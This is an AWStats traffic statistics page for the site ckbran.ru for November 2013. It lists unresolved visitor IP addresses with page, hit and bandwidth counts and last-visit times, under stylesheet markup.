.aws_border { border-collapse: collapse; background-color: #CCCCDD; padding: 1px 1px 1px 1px; margin-top: 0px; margin-bottom: 0px; }
.aws_title { font: 13px verdana, arial, helvetica, sans-serif; font-weight: bold; background-color: #CCCCDD; text-align: center; margin-top: 0; margin-bottom: 0; padding: 1px 1px 1px 1px; color: #000000; }
.aws_blank { font: 13px verdana, arial, helvetica, sans-serif; background-color: #FFFFFF; text-align: center; margin-bottom: 0; padding: 1px 1px 1px 1px; }
.aws_data {
background-color: #FFFFFF;
border-top-width: 1px;
border-left-width: 0px;
border-right-width: 0px;
border-bottom-width: 0px;
}
.aws_formfield { font: 13px verdana, arial, helvetica; }
.aws_button {
font-family: arial,verdana,helvetica, sans-serif;
font-size: 12px;
border: 1px solid #ccd7e0;
background-image : url(/awstatsicons/other/button.gif);
}
th { border-color: #ECECEC; border-left-width: 0px; border-right-width: 1px; border-top-width: 0px; border-bottom-width: 1px; padding: 1px 2px 1px 1px; font: 11px verdana, arial, helvetica, sans-serif; text-align:center; color: #000000; }
th.aws { border-color: #ECECEC; border-left-width: 0px; border-right-width: 1px; border-top-width: 0px; border-bottom-width: 1px; padding: 1px 2px 1px 1px; font-size: 13px; font-weight: bold; }
td { border-color: #ECECEC; border-left-width: 0px; border-right-width: 1px; border-top-width: 0px; border-bottom-width: 1px; font: 11px verdana, arial, helvetica, sans-serif; text-align:center; color: #000000; }
td.aws { border-color: #ECECEC; border-left-width: 0px; border-right-width: 1px; border-top-width: 0px; border-bottom-width: 1px; font: 11px verdana, arial, helvetica, sans-serif; text-align:left; color: #000000; padding: 0px;}
td.awsm { border-left-width: 0px; border-right-width: 0px; border-top-width: 0px; border-bottom-width: 0px; font: 11px verdana, arial, helvetica, sans-serif; text-align:left; color: #000000; padding: 0px; }
b { font-weight: bold; }
a { font: 11px verdana, arial, helvetica, sans-serif; }
a:link { color: #0011BB; text-decoration: none; }
a:visited { color: #0011BB; text-decoration: none; }
a:hover { color: #605040; text-decoration: underline; }
.currentday { font-weight: bold; }
//-->
</style>
</head>
<body style="margin-top: 0px">
<a name="top"></a>
<a name="menu"> </a>
<form name="FormDateFilter" action="/cgi-bin/awstats.pl?config=ckbran.ru&output=unknownip" style="padding: 0px 0px 0px 0px; margin-top: 0">
<table class="aws_border" border="0" cellpadding="2" cellspacing="0" width="100%">
<tr><td>
<table class="aws_data sortable" border="0" cellpadding="1" cellspacing="0" width="100%">
<tr><td class="aws" valign="middle"><b>Statistics for:</b> </td><td class="aws" valign="middle"><span style="font-size: 14px;">ckbran.ru</span></td><td align="right" rowspan="3"><a href="http://awstats.sourceforge.net" target="awstatshome"><img src="/awstatsicons/other/awstats_logo6.png" border="0" alt='Awstats Web Site' title='Awstats Web Site' /></a></td></tr>
<tr valign="middle"><td class="aws" valign="middle" width="150"><b>Last Update:</b> </td><td class="aws" valign="middle"><span style="font-size: 12px;">30 Dec 2013 - 00:01</span></td></tr>
<tr><td class="aws" valign="middle"><b>Reported period:</b></td><td class="aws" valign="middle"><span style="font-size: 14px;">Month Nov 2013</span></td></tr>
</table>
</td></tr></table>
</form>
<table>
<tr><td class="aws"><a href="javascript:parent.window.close();">Close window</a></td></tr>
</table>
<a name="unknownip"> </a><br />
<table class="aws_border sortable" border="0" cellpadding="2" cellspacing="0" width="100%">
<tr><td class="aws_title" width="70%">Unresolved IP Address </td><td class="aws_blank"> </td></tr>
<tr><td colspan="2">
<table class="aws_data" border="1" cellpadding="2" cellspacing="0" width="100%">
<tr bgcolor="#ECECEC"><th>63925 Unknown (unresolved ip)</th><th bgcolor="#4477DD" width="80">Pages</th><th bgcolor="#66DDEE" width="80">Hits</th><th class="datasize" bgcolor="#2EA495" width="80">Bandwidth</th><th width="120">Last visit</th></tr>
<tr><td class="aws">83.149.210.100</td><td>52363</td><td>68103</td><td>2.36 GB</td><td>30 Nov 2013 - 23:56</td></tr>
<tr><td class="aws">103.31.186.84</td><td>12091</td><td>12091</td><td>85.47 MB</td><td>25 Nov 2013 - 03:00</td></tr>
<tr><td class="aws">37.9.53.129</td><td>6682</td><td>6682</td><td>271.37 MB</td><td>17 Nov 2013 - 18:32</td></tr>
<tr><td class="aws">83.149.210.115</td><td>5462</td><td>19360</td><td>1.08 GB</td><td>30 Nov 2013 - 23:44</td></tr>
<tr><td class="aws">217.197.124.24</td><td>5189</td><td>5189</td><td>59.36 MB</td><td>30 Nov 2013 - 09:03</td></tr>
<tr><td class="aws">176.102.35.189</td><td>4315</td><td>4315</td><td>30.50 MB</td><td>19 Nov 2013 - 06:41</td></tr>
<tr><td class="aws">193.105.154.231</td><td>3428</td><td>3428</td><td>10.32 MB</td><td>30 Nov 2013 - 07:58</td></tr>
<tr><td class="aws">91.200.13.5</td><td>3175</td><td>3175</td><td>22.45 MB</td><td>19 Nov 2013 - 06:08</td></tr>
<tr><td class="aws">108.163.158.129</td><td>1972</td><td>4897</td><td>52.33 MB</td><td>27 Nov 2013 - 16:06</td></tr>
<tr><td class="aws">46.188.9.3</td><td>1317</td><td>2467</td><td>76.97 MB</td><td>30 Nov 2013 - 23:19</td></tr>
<tr><td class="aws">37.200.68.228</td><td>862</td><td>872</td><td>37.52 MB</td><td>07 Nov 2013 - 09:01</td></tr>
<tr><td class="aws">77.246.99.70</td><td>693</td><td>2595</td><td>127.85 MB</td><td>30 Nov 2013 - 23:00</td></tr>
<tr><td class="aws">77.108.75.50</td><td>693</td><td>775</td><td>8.91 MB</td><td>30 Nov 2013 - 23:03</td></tr>
<tr><td class="aws">188.244.36.5</td><td>662</td><td>2759</td><td>280.50 MB</td><td>30 Nov 2013 - 20:13</td></tr>
<tr><td class="aws">217.26.17.115</td><td>620</td><td>1016</td><td>94.75 MB</td><td>30 Nov 2013 - 13:27</td></tr>
<tr><td class="aws">79.174.35.178</td><td>535</td><td>535</td><td>5.95 MB</td><td>30 Nov 2013 - 23:55</td></tr>
<tr><td class="aws">194.165.0.6</td><td>525</td><td>1609</td><td>103.34 MB</td><td>30 Nov 2013 - 20:56</td></tr>
<tr><td class="aws">195.16.88.106</td><td>515</td><td>515</td><td>1.97 MB</td><td>01 Nov 2013 - 18:12</td></tr>
<tr><td class="aws">46.188.27.2</td><td>510</td><td>1184</td><td>106.81 MB</td><td>30 Nov 2013 - 10:47</td></tr>
<tr><td class="aws">208.177.76.25</td><td>503</td><td>503</td><td>22.25 MB</td><td>30 Nov 2013 - 16:30</td></tr>
<tr><td class="aws">188.123.230.140</td><td>497</td><td>933</td><td>21.62 MB</td><td>30 Nov 2013 - 23:55</td></tr>
<tr><td class="aws">46.46.152.212</td><td>487</td><td>623</td><td>12.59 MB</td><td>30 Nov 2013 - 23:22</td></tr>
<tr><td class="aws">77.246.227.184</td><td>479</td><td>479</td><td>19.10 MB</td><td>30 Nov 2013 - 23:07</td></tr>
<tr><td class="aws">46.29.153.82</td><td>471</td><td>471</td><td>4.57 MB</td><td>30 Nov 2013 - 23:51</td></tr>
<tr><td class="aws">85.21.93.138</td><td>465</td><td>1652</td><td>37.41 MB</td><td>29 Nov 2013 - 07:10</td></tr>
<tr><td class="aws">194.84.19.17</td><td>454</td><td>497</td><td>22.11 MB</td><td>27 Nov 2013 - 09:09</td></tr>
<tr><td class="aws">178.140.225.202</td><td>450</td><td>450</td><td>4.45 MB</td><td>30 Nov 2013 - 23:48</td></tr>
<tr><td class="aws">213.221.3.177</td><td>442</td><td>936</td><td>30.70 MB</td><td>29 Nov 2013 - 15:35</td></tr>
<tr><td class="aws">46.188.25.5</td><td>433</td><td>1457</td><td>80.50 MB</td><td>30 Nov 2013 - 20:23</td></tr>
<tr><td class="aws">176.123.176.227</td><td>425</td><td>1570</td><td>85.28 MB</td><td>29 Nov 2013 - 18:45</td></tr>
<tr><td class="aws">93.185.192.78</td><td>408</td><td>487</td><td>7.31 MB</td><td>30 Nov 2013 - 23:59</td></tr>
<tr><td class="aws">91.215.188.101</td><td>406</td><td>406</td><td>16.02 MB</td><td>26 Nov 2013 - 23:41</td></tr>
<tr><td class="aws">193.178.131.1</td><td>399</td><td>2215</td><td>104.85 MB</td><td>28 Nov 2013 - 08:19</td></tr>
<tr><td class="aws">128.69.142.172</td><td>373</td><td>373</td><td>4.39 MB</td><td>11 Nov 2013 - 13:58</td></tr>
<tr><td class="aws">66.249.81.78</td><td>362</td><td>1866</td><td>77.68 MB</td><td>30 Nov 2013 - 21:27</td></tr>
<tr><td class="aws">83.149.226.11</td><td>341</td><td>518</td><td>22.42 MB</td><td>30 Nov 2013 - 23:21</td></tr>
<tr><td class="aws">62.231.11.142</td><td>338</td><td>1936</td><td>50.15 MB</td><td>29 Nov 2013 - 11:59</td></tr>
<tr><td class="aws">5.9.139.74</td><td>322</td><td>322</td><td>15.97 MB</td><td>05 Nov 2013 - 08:20</td></tr>
<tr><td class="aws">195.245.206.67</td><td>322</td><td>1921</td><td>70.63 MB</td><td>30 Nov 2013 - 12:13</td></tr>
<tr><td class="aws">89.252.70.208</td><td>322</td><td>322</td><td>3.41 MB</td><td>17 Nov 2013 - 01:34</td></tr>
<tr><td class="aws">194.186.207.105</td><td>321</td><td>1868</td><td>114.59 MB</td><td>29 Nov 2013 - 12:47</td></tr>
<tr><td class="aws">83.149.241.182</td><td>317</td><td>766</td><td>23.92 MB</td><td>13 Nov 2013 - 09:42</td></tr>
<tr><td class="aws">178.215.98.177</td><td>314</td><td>351</td><td>4.21 MB</td><td>30 Nov 2013 - 23:43</td></tr>
<tr><td class="aws">46.242.69.47</td><td>314</td><td>397</td><td>11.31 MB</td><td>30 Nov 2013 - 23:31</td></tr>
<tr><td class="aws">85.93.133.46</td><td>309</td><td>309</td><td>3.82 MB</td><td>27 Nov 2013 - 18:47</td></tr>
<tr><td class="aws">178.137.162.227</td><td>309</td><td>309</td><td>14.04 MB</td><td>12 Nov 2013 - 16:32</td></tr>
<tr><td class="aws">77.233.225.114</td><td>308</td><td>308</td><td>3.50 MB</td><td>29 Nov 2013 - 01:10</td></tr>
<tr><td class="aws">81.211.24.78</td><td>305</td><td>305</td><td>3.23 MB</td><td>29 Nov 2013 - 16:02</td></tr>
<tr><td class="aws">95.120.228.7</td><td>301</td><td>321</td><td>11.17 MB</td><td>04 Nov 2013 - 21:09</td></tr>
<tr><td class="aws">94.228.193.24</td><td>299</td><td>299</td><td>3.25 MB</td><td>30 Nov 2013 - 23:45</td></tr>
<tr><td class="aws">77.50.158.107</td><td>298</td><td>298</td><td>2.90 MB</td><td>30 Nov 2013 - 23:33</td></tr>
<tr><td class="aws">128.72.92.238</td><td>298</td><td>324</td><td>4.36 MB</td><td>29 Nov 2013 - 03:46</td></tr>
<tr><td class="aws">212.45.20.62</td><td>296</td><td>1037</td><td>55.68 MB</td><td>29 Nov 2013 - 17:00</td></tr>
<tr><td class="aws">85.90.98.45</td><td>296</td><td>296</td><td>3.67 MB</td><td>30 Nov 2013 - 23:11</td></tr>
<tr><td class="aws">95.24.138.140</td><td>295</td><td>295</td><td>3.47 MB</td><td>12 Nov 2013 - 02:16</td></tr>
<tr><td class="aws">95.128.242.177</td><td>293</td><td>381</td><td>6.08 MB</td><td>30 Nov 2013 - 18:01</td></tr>
<tr><td class="aws">194.84.74.27</td><td>291</td><td>1349</td><td>121.54 MB</td><td>29 Nov 2013 - 13:33</td></tr>
<tr><td class="aws">31.13.60.46</td><td>289</td><td>1929</td><td>54.02 MB</td><td>30 Nov 2013 - 08:35</td></tr>
<tr><td class="aws">195.68.187.42</td><td>282</td><td>312</td><td>12.07 MB</td><td>29 Nov 2013 - 14:28</td></tr>
<tr><td class="aws">193.222.109.148</td><td>276</td><td>397</td><td>12.52 MB</td><td>30 Nov 2013 - 23:06</td></tr>
<tr><td class="aws">86.62.82.225</td><td>274</td><td>392</td><td>9.42 MB</td><td>30 Nov 2013 - 09:10</td></tr>
<tr><td class="aws">37.204.24.136</td><td>273</td><td>1122</td><td>65.33 MB</td><td>30 Nov 2013 - 23:48</td></tr>
<tr><td class="aws">62.117.72.154</td><td>272</td><td>453</td><td>13.26 MB</td><td>28 Nov 2013 - 13:55</td></tr>
<tr><td class="aws">109.188.124.33</td><td>271</td><td>286</td><td>8.27 MB</td><td>29 Nov 2013 - 12:15</td></tr>
<tr><td class="aws">195.19.94.128</td><td>267</td><td>389</td><td>12.14 MB</td><td>26 Nov 2013 - 12:44</td></tr>
<tr><td class="aws">62.118.164.246</td><td>266</td><td>296</td><td>8.26 MB</td><td>29 Nov 2013 - 23:36</td></tr>
<tr><td class="aws">194.190.111.56</td><td>266</td><td>816</td><td>25.17 MB</td><td>30 Nov 2013 - 23:12</td></tr>
<tr><td class="aws">188.123.237.5</td><td>258</td><td>537</td><td>24.06 MB</td><td>30 Nov 2013 - 20:48</td></tr>
<tr><td class="aws">77.87.207.193</td><td>255</td><td>374</td><td>22.62 MB</td><td>30 Nov 2013 - 02:12</td></tr>
<tr><td class="aws">62.117.124.61</td><td>255</td><td>610</td><td>43.63 MB</td><td>29 Nov 2013 - 14:35</td></tr>
<tr><td class="aws">199.15.233.130</td><td>252</td><td>252</td><td>11.14 MB</td><td>30 Nov 2013 - 12:22</td></tr>
<tr><td class="aws">69.84.207.246</td><td>250</td><td>250</td><td>10.61 MB</td><td>25 Nov 2013 - 11:25</td></tr>
<tr><td class="aws">93.182.36.86</td><td>248</td><td>248</td><td>10.31 MB</td><td>30 Nov 2013 - 22:06</td></tr>
<tr><td class="aws">93.182.36.82</td><td>248</td><td>248</td><td>10.31 MB</td><td>25 Nov 2013 - 12:28</td></tr>
<tr><td class="aws">82.204.249.206</td><td>246</td><td>857</td><td>73.54 MB</td><td>30 Nov 2013 - 13:27</td></tr>
<tr><td class="aws">178.215.98.199</td><td>243</td><td>737</td><td>87.13 MB</td><td>15 Nov 2013 - 22:08</td></tr>
<tr><td class="aws">95.215.97.122</td><td>243</td><td>273</td><td>3.35 MB</td><td>30 Nov 2013 - 23:34</td></tr>
<tr><td class="aws">188.123.230.227</td><td>239</td><td>292</td><td>4.62 MB</td><td>26 Nov 2013 - 17:27</td></tr>
<tr><td class="aws">194.165.0.3</td><td>238</td><td>533</td><td>32.46 MB</td><td>30 Nov 2013 - 21:32</td></tr>
<tr><td class="aws">208.177.76.14</td><td>236</td><td>236</td><td>10.40 MB</td><td>30 Nov 2013 - 01:35</td></tr>
<tr><td class="aws">83.149.244.216</td><td>235</td><td>578</td><td>30.04 MB</td><td>29 Nov 2013 - 18:12</td></tr>
<tr><td class="aws">89.169.9.19</td><td>235</td><td>235</td><td>2.27 MB</td><td>30 Nov 2013 - 21:48</td></tr>
<tr><td class="aws">92.243.183.37</td><td>234</td><td>386</td><td>12.71 MB</td><td>24 Nov 2013 - 14:32</td></tr>
<tr><td class="aws">91.200.13.57</td><td>231</td><td>231</td><td>10.46 MB</td><td>29 Nov 2013 - 12:45</td></tr>
<tr><td class="aws">94.158.169.145</td><td>230</td><td>1037</td><td>93.33 MB</td><td>30 Nov 2013 - 23:39</td></tr>
<tr><td class="aws">91.211.217.227</td><td>229</td><td>773</td><td>37.19 MB</td><td>29 Nov 2013 - 10:36</td></tr>
<tr><td class="aws">5.228.91.185</td><td>227</td><td>242</td><td>6.31 MB</td><td>12 Nov 2013 - 06:07</td></tr>
<tr><td class="aws">188.234.168.193</td><td>227</td><td>227</td><td>2.58 MB</td><td>30 Nov 2013 - 23:52</td></tr>
<tr><td class="aws">93.80.47.156</td><td>226</td><td>226</td><td>2.74 MB</td><td>29 Nov 2013 - 00:56</td></tr>
<tr><td class="aws">83.149.210.118</td><td>225</td><td>1277</td><td>133.78 MB</td><td>30 Nov 2013 - 20:14</td></tr>
<tr><td class="aws">178.137.80.33</td><td>222</td><td>259</td><td>14.07 MB</td><td>30 Nov 2013 - 23:30</td></tr>
<tr><td class="aws">195.178.200.86</td><td>221</td><td>512</td><td>31.77 MB</td><td>29 Nov 2013 - 10:24</td></tr>
<tr><td class="aws">89.178.198.97</td><td>218</td><td>218</td><td>2.59 MB</td><td>18 Nov 2013 - 07:14</td></tr>
<tr><td class="aws">87.228.63.216</td><td>217</td><td>243</td><td>3.83 MB</td><td>30 Nov 2013 - 23:32</td></tr>
<tr><td class="aws">188.123.231.171</td><td>216</td><td>603</td><td>33.35 MB</td><td>25 Nov 2013 - 07:39</td></tr>
<tr><td class="aws">94.158.169.18</td><td>215</td><td>436</td><td>13.34 MB</td><td>30 Nov 2013 - 23:35</td></tr>
<tr><td class="aws">176.62.178.220</td><td>215</td><td>215</td><td>2.70 MB</td><td>28 Nov 2013 - 07:32</td></tr>
<tr><td class="aws">67.211.200.219</td><td>214</td><td>214</td><td>1.51 MB</td><td>17 Nov 2013 - 01:41</td></tr>
<tr><td class="aws">37.16.82.194</td><td>213</td><td>452</td><td>13.53 MB</td><td>28 Nov 2013 - 16:18</td></tr>
<tr><td class="aws">5.228.91.53</td><td>212</td><td>212</td><td>2.07 MB</td><td>22 Nov 2013 - 07:37</td></tr>
<tr><td class="aws">31.42.41.129</td><td>212</td><td>212</td><td>2.06 MB</td><td>30 Nov 2013 - 23:13</td></tr>
<tr><td class="aws">83.149.247.4</td><td>212</td><td>610</td><td>31.15 MB</td><td>29 Nov 2013 - 09:09</td></tr>
<tr><td class="aws">188.123.231.191</td><td>212</td><td>532</td><td>27.22 MB</td><td>30 Nov 2013 - 21:55</td></tr>
<tr><td class="aws">212.57.113.99</td><td>210</td><td>471</td><td>43.83 MB</td><td>29 Nov 2013 - 15:23</td></tr>
<tr><td class="aws">62.176.4.7</td><td>210</td><td>286</td><td>11.92 MB</td><td>29 Nov 2013 - 14:40</td></tr>
<tr><td class="aws">193.202.91.11</td><td>210</td><td>432</td><td>32.73 MB</td><td>22 Nov 2013 - 08:59</td></tr>
<tr><td class="aws">188.123.230.111</td><td>209</td><td>427</td><td>18.88 MB</td><td>28 Nov 2013 - 21:38</td></tr>
<tr><td class="aws">83.246.196.40</td><td>208</td><td>208</td><td>2.95 MB</td><td>30 Nov 2013 - 18:44</td></tr>
<tr><td class="aws">109.94.19.46</td><td>207</td><td>221</td><td>5.77 MB</td><td>04 Nov 2013 - 18:28</td></tr>
<tr><td class="aws">79.173.68.4</td><td>206</td><td>206</td><td>2.62 MB</td><td>30 Nov 2013 - 22:41</td></tr>
<tr><td class="aws">31.193.90.130</td><td>206</td><td>206</td><td>2.94 MB</td><td>30 Nov 2013 - 16:50</td></tr>
<tr><td class="aws">109.188.127.40</td><td>203</td><td>603</td><td>31.07 MB</td><td>29 Nov 2013 - 08:30</td></tr>
<tr><td class="aws">217.10.38.139</td><td>200</td><td>315</td><td>20.36 MB</td><td>30 Nov 2013 - 21:58</td></tr>
<tr><td class="aws">188.244.36.6</td><td>199</td><td>1304</td><td>74.67 MB</td><td>30 Nov 2013 - 19:18</td></tr>
<tr><td class="aws">207.182.143.114</td><td>199</td><td>199</td><td>9.80 MB</td><td>23 Nov 2013 - 20:37</td></tr>
<tr><td class="aws">37.204.62.58</td><td>197</td><td>197</td><td>2.04 MB</td><td>28 Nov 2013 - 05:57</td></tr>
<tr><td class="aws">89.189.170.5</td><td>197</td><td>222</td><td>3.27 MB</td><td>30 Nov 2013 - 21:15</td></tr>
<tr><td class="aws">198.100.146.34</td><td>197</td><td>197</td><td>8.73 MB</td><td>22 Nov 2013 - 05:51</td></tr>
<tr><td class="aws">89.249.248.137</td><td>196</td><td>239</td><td>11.09 MB</td><td>29 Nov 2013 - 16:43</td></tr>
<tr><td class="aws">188.123.237.51</td><td>196</td><td>352</td><td>5.19 MB</td><td>22 Nov 2013 - 13:35</td></tr>
<tr><td class="aws">79.164.88.81</td><td>196</td><td>196</td><td>1.91 MB</td><td>30 Nov 2013 - 22:47</td></tr>
<tr><td class="aws">77.232.15.158</td><td>193</td><td>220</td><td>2.82 MB</td><td>30 Nov 2013 - 23:30</td></tr>
<tr><td class="aws">217.117.112.148</td><td>192</td><td>736</td><td>32.11 MB</td><td>30 Nov 2013 - 22:45</td></tr>
<tr><td class="aws">194.85.9.14</td><td>191</td><td>774</td><td>67.62 MB</td><td>30 Nov 2013 - 17:08</td></tr>
<tr><td class="aws">178.215.97.67</td><td>189</td><td>189</td><td>1.92 MB</td><td>25 Nov 2013 - 14:00</td></tr>
<tr><td class="aws">94.228.194.54</td><td>189</td><td>411</td><td>21.89 MB</td><td>30 Nov 2013 - 19:26</td></tr>
<tr><td class="aws">128.68.243.3</td><td>189</td><td>189</td><td>2.24 MB</td><td>27 Nov 2013 - 04:19</td></tr>
<tr><td class="aws">62.182.48.60</td><td>189</td><td>219</td><td>2.78 MB</td><td>30 Nov 2013 - 15:18</td></tr>
<tr><td class="aws">46.188.6.3</td><td>187</td><td>602</td><td>22.44 MB</td><td>30 Nov 2013 - 15:29</td></tr>
<tr><td class="aws">188.123.248.4</td><td>186</td><td>477</td><td>27.14 MB</td><td>29 Nov 2013 - 23:12</td></tr>
<tr><td class="aws">95.25.81.217</td><td>185</td><td>231</td><td>8.64 MB</td><td>13 Nov 2013 - 10:58</td></tr>
<tr><td class="aws">46.39.34.12</td><td>184</td><td>184</td><td>2.25 MB</td><td>30 Nov 2013 - 21:27</td></tr>
<tr><td class="aws">188.123.231.166</td><td>183</td><td>402</td><td>24.70 MB</td><td>30 Nov 2013 - 16:15</td></tr>
<tr><td class="aws">91.78.195.66</td><td>183</td><td>444</td><td>65.76 MB</td><td>30 Nov 2013 - 22:31</td></tr>
<tr><td class="aws">87.226.160.251</td><td>182</td><td>482</td><td>25.78 MB</td><td>21 Nov 2013 - 12:32</td></tr>
<tr><td class="aws">95.143.213.238</td><td>181</td><td>210</td><td>3.52 MB</td><td>30 Nov 2013 - 23:42</td></tr>
<tr><td class="aws">82.145.208.195</td><td>181</td><td>1627</td><td>47.68 MB</td><td>30 Nov 2013 - 08:37</td></tr>
<tr><td class="aws">188.123.231.3</td><td>180</td><td>265</td><td>13.59 MB</td><td>30 Nov 2013 - 22:46</td></tr>
<tr><td class="aws">194.50.24.2</td><td>178</td><td>781</td><td>28.32 MB</td><td>21 Nov 2013 - 16:32</td></tr>
<tr><td class="aws">91.207.7.174</td><td>176</td><td>176</td><td>7.32 MB</td><td>30 Nov 2013 - 21:32</td></tr>
<tr><td class="aws">94.198.130.54</td><td>176</td><td>201</td><td>2.77 MB</td><td>19 Nov 2013 - 12:14</td></tr>
<tr><td class="aws">195.234.210.6</td><td>175</td><td>175</td><td>7.03 MB</td><td>29 Nov 2013 - 16:24</td></tr>
<tr><td class="aws">193.164.146.121</td><td>175</td><td>608</td><td>42.39 MB</td><td>29 Nov 2013 - 14:21</td></tr>
<tr><td class="aws">78.30.193.20</td><td>174</td><td>174</td><td>7.75 MB</td><td>30 Nov 2013 - 22:35</td></tr>
<tr><td class="aws">94.198.111.74</td><td>174</td><td>740</td><td>42.16 MB</td><td>29 Nov 2013 - 16:29</td></tr>
<tr><td class="aws">188.123.231.88</td><td>174</td><td>174</td><td>1.88 MB</td><td>30 Nov 2013 - 23:37</td></tr>
<tr><td class="aws">91.219.227.195</td><td>173</td><td>385</td><td>46.17 MB</td><td>28 Nov 2013 - 14:23</td></tr>
<tr><td class="aws">213.251.211.220</td><td>172</td><td>172</td><td>1.76 MB</td><td>29 Nov 2013 - 19:12</td></tr>
<tr><td class="aws">91.142.135.14</td><td>172</td><td>1004</td><td>49.15 MB</td><td>29 Nov 2013 - 08:23</td></tr>
<tr><td class="aws">92.243.181.28</td><td>171</td><td>715</td><td>19.85 MB</td><td>17 Nov 2013 - 20:42</td></tr>
<tr><td class="aws">188.254.103.3</td><td>171</td><td>457</td><td>15.85 MB</td><td>26 Nov 2013 - 13:23</td></tr>
<tr><td class="aws">5.228.218.123</td><td>170</td><td>235</td><td>6.77 MB</td><td>20 Nov 2013 - 00:53</td></tr>
<tr><td class="aws">109.207.171.40</td><td>169</td><td>479</td><td>53.22 MB</td><td>26 Nov 2013 - 09:45</td></tr>
<tr><td class="aws">212.16.16.38</td><td>168</td><td>192</td><td>3.23 MB</td><td>21 Nov 2013 - 09:37</td></tr>
<tr><td class="aws">95.25.51.15</td><td>168</td><td>168</td><td>1.74 MB</td><td>20 Nov 2013 - 20:41</td></tr>
<tr><td class="aws">91.192.70.21</td><td>167</td><td>457</td><td>36.74 MB</td><td>30 Nov 2013 - 21:39</td></tr>
<tr><td class="aws">95.165.64.32</td><td>167</td><td>167</td><td>1.78 MB</td><td>19 Nov 2013 - 06:58</td></tr>
<tr><td class="aws">95.84.237.108</td><td>167</td><td>236</td><td>5.30 MB</td><td>30 Nov 2013 - 23:57</td></tr>
<tr><td class="aws">188.244.40.6</td><td>167</td><td>811</td><td>51.62 MB</td><td>26 Nov 2013 - 20:43</td></tr>
<tr><td class="aws">37.204.166.30</td><td>167</td><td>167</td><td>1.71 MB</td><td>30 Nov 2013 - 22:36</td></tr>
<tr><td class="aws">188.255.80.34</td><td>166</td><td>166</td><td>1.69 MB</td><td>25 Nov 2013 - 18:27</td></tr>
<tr><td class="aws">188.32.189.100</td><td>165</td><td>1021</td><td>23.98 MB</td><td>21 Nov 2013 - 08:44</td></tr>
<tr><td class="aws">91.215.192.1</td><td>164</td><td>164</td><td>1.68 MB</td><td>14 Nov 2013 - 08:01</td></tr>
<tr><td class="aws">188.255.40.114</td><td>162</td><td>162</td><td>1.61 MB</td><td>30 Nov 2013 - 23:50</td></tr>
<tr><td class="aws">94.158.161.99</td><td>162</td><td>472</td><td>26.94 MB</td><td>26 Nov 2013 - 12:47</td></tr>
<tr><td class="aws">195.178.108.38</td><td>162</td><td>539</td><td>27.55 MB</td><td>30 Nov 2013 - 11:01</td></tr>
<tr><td class="aws">94.102.56.238</td><td>161</td><td>161</td><td>6.99 MB</td><td>30 Nov 2013 - 16:41</td></tr>
<tr><td class="aws">80.87.145.11</td><td>161</td><td>161</td><td>1.74 MB</td><td>30 Nov 2013 - 23:45</td></tr>
<tr><td class="aws">188.244.42.3</td><td>160</td><td>575</td><td>33.46 MB</td><td>24 Nov 2013 - 22:37</td></tr>
<tr><td class="aws">94.45.188.62</td><td>159</td><td>159</td><td>7.24 MB</td><td>30 Nov 2013 - 08:34</td></tr>
<tr><td class="aws">95.128.242.178</td><td>159</td><td>332</td><td>17.20 MB</td><td>30 Nov 2013 - 13:51</td></tr>
<tr><td class="aws">217.172.29.30</td><td>159</td><td>254</td><td>8.08 MB</td><td>20 Nov 2013 - 01:01</td></tr>
<tr><td class="aws">213.221.47.54</td><td>159</td><td>543</td><td>42.96 MB</td><td>29 Nov 2013 - 12:24</td></tr>
<tr><td class="aws">80.251.112.201</td><td>158</td><td>371</td><td>11.46 MB</td><td>27 Nov 2013 - 15:12</td></tr>
<tr><td class="aws">188.123.231.76</td><td>157</td><td>187</td><td>2.44 MB</td><td>30 Nov 2013 - 23:20</td></tr>
<tr><td class="aws">194.54.148.8</td><td>156</td><td>450</td><td>16.86 MB</td><td>29 Nov 2013 - 13:52</td></tr>
<tr><td class="aws">217.151.131.82</td><td>156</td><td>573</td><td>34.40 MB</td><td>28 Nov 2013 - 13:33</td></tr>
<tr><td class="aws">46.242.32.8</td><td>155</td><td>211</td><td>3.92 MB</td><td>30 Nov 2013 - 23:40</td></tr>
<tr><td class="aws">91.222.80.12</td><td>155</td><td>155</td><td>2.28 MB</td><td>29 Nov 2013 - 16:05</td></tr>
<tr><td class="aws">94.228.194.2</td><td>154</td><td>446</td><td>24.62 MB</td><td>26 Nov 2013 - 03:54</td></tr>
<tr><td class="aws">95.28.192.251</td><td>154</td><td>154</td><td>1.57 MB</td><td>27 Nov 2013 - 04:06</td></tr>
<tr><td class="aws">193.34.210.131</td><td>154</td><td>178</td><td>2.69 MB</td><td>25 Nov 2013 - 13:35</td></tr>
<tr><td class="aws">46.73.228.185</td><td>153</td><td>333</td><td>31.12 MB</td><td>02 Nov 2013 - 23:07</td></tr>
<tr><td class="aws">31.130.159.213</td><td>153</td><td>153</td><td>1.49 MB</td><td>30 Nov 2013 - 18:45</td></tr>
<tr><td class="aws">188.244.41.5</td><td>153</td><td>328</td><td>9.51 MB</td><td>29 Nov 2013 - 19:29</td></tr>
<tr><td class="aws">176.56.236.211</td><td>153</td><td>153</td><td>675.85 KB</td><td>19 Nov 2013 - 21:09</td></tr>
<tr><td class="aws">95.139.171.108</td><td>152</td><td>338</td><td>50.61 MB</td><td>30 Nov 2013 - 14:23</td></tr>
<tr><td class="aws">95.165.111.144</td><td>152</td><td>366</td><td>25.43 MB</td><td>10 Nov 2013 - 18:40</td></tr>
<tr><td class="aws">188.32.141.98</td><td>152</td><td>614</td><td>44.29 MB</td><td>16 Nov 2013 - 19:18</td></tr>
<tr><td class="aws">37.110.82.102</td><td>151</td><td>588</td><td>71.58 MB</td><td>26 Nov 2013 - 14:16</td></tr>
<tr><td class="aws">213.138.68.93</td><td>151</td><td>175</td><td>6.66 MB</td><td>16 Nov 2013 - 21:25</td></tr>
<tr><td class="aws">217.172.29.51</td><td>151</td><td>151</td><td>1.51 MB</td><td>30 Nov 2013 - 00:44</td></tr>
<tr><td class="aws">188.123.231.69</td><td>151</td><td>366</td><td>11.19 MB</td><td>25 Nov 2013 - 09:50</td></tr>
<tr><td class="aws">46.188.34.3</td><td>151</td><td>733</td><td>55.21 MB</td><td>29 Nov 2013 - 09:57</td></tr>
<tr><td class="aws">89.17.48.71</td><td>150</td><td>197</td><td>6.78 MB</td><td>23 Nov 2013 - 11:18</td></tr>
<tr><td class="aws">194.143.138.24</td><td>149</td><td>802</td><td>86.23 MB</td><td>29 Nov 2013 - 13:44</td></tr>
<tr><td class="aws">37.190.58.109</td><td>149</td><td>521</td><td>10.15 MB</td><td>30 Nov 2013 - 21:02</td></tr>
<tr><td class="aws">208.177.76.7</td><td>149</td><td>149</td><td>6.60 MB</td><td>29 Nov 2013 - 20:57</td></tr>
